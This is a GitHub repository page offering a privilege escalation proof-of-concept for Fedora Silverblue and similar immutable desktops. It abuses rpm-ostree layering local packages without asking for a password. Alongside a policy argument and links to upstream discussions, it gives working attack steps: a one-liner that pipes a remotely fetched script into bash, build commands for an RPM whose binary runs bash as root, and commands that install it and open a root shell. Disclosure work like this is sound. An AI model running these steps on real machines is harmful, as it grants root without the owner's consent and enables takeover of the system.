Skip to content

rohanssrao/silverblue-privesc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 

Repository files navigation

A privilege escalation proof-of-concept for Fedora immutable desktops, using the fact that rpm-ostree install doesn't ask for the user's password to install local packages.

This is a demonstration that any program running as a member of the wheel group (e.g., a pip or npm package, or curl | bash) is able to execute arbitrary code as root without user interaction.

One-liner

bash <(curl https://raw.githubusercontent.com/rohanssrao/silverblue-privesc/main/privesc.sh)

To undo: rpm-ostree remove privesc

More info

Fedora's Privilege Escalation Policy says:

The policy requires that any code which allows an unprivileged user account to perform, or cause to be performed, certain actions must require administrative authentication prior to the action being carried out. The actions are:

  • Add, remove, or downgrade any system-wide application or shared resource (packaged or otherwise), with the exception that for installing Fedora-signed packages from administrator-configured repositories, the requirement to ask for a password is waived for members of the wheel group who are local and active.

privesc.rpm is not Fedora-signed or from an administrator-configured repository, so this behavior can be considered a violation of the policy.

The relevant Polkit rule is here.

Discussions: coreos/rpm-ostree#745, coreos/rpm-ostree#825

Manual

Requirements:

dnf install rpmdevtools gcc glibc-static

Building:

rpmbuild --bb --define "_rpmdir $(pwd)" --define "_rpmfilename privesc.rpm" privesc.spec

This generates privesc.rpm in the current directory. Installing the package creates /usr/bin/privesc which simply runs bash as root.

Usage:

# Layer package
rpm-ostree install privesc.rpm
# Enter root shell. privesc is placed in the newest deployment
"$(ls -td /ostree/deploy/fedora/deploy/*/ | head -1)"/usr/bin/privesc